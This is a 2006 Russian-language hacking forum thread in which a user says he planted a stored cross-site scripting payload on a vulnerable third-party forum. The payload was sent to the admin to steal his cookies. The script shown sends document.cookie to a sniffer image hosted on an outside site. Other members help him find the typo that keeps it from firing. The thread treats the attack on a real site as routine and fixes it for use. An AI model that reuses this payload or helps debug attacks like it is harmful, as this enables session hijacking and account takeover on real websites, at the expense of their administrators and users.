Форумы Вопрос по организации XSS атаки, на уязвимом форуме..

Discussion in 'Уязвимости CMS/форумов' started by a1nt, 9 Jul 2006.

  1. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    Нашел уязвимый форум, где можно вставить
    Code:
    <script></script>
    . Чтобы забрать cookies админа отправил ему сообщение
    Code:
    <script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
    Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?
     
  2. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    919
    Likes Received:
    213
    Reputations:
    154
    Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.
     
  3. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция
    Code:
    <script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
    Не работает на моем компьютере.
     
  4. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Найди отличие
     
  5. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    я помогу.

     
  6. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    382
    Likes Received:
    144
    Reputations:
    29
    точку забыл!
     
    1 person likes this.
  7. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    757
    Likes Received:
    351
    Reputations:
    353
    a1nt, это приватная инфа - в паблике нету...
     
    1 person likes this.
  8. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    dracula4ever, D1mOn: Пять за сообразительность :)
     
    1 person likes this.
  9. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.
     
    1 person likes this.
Loading...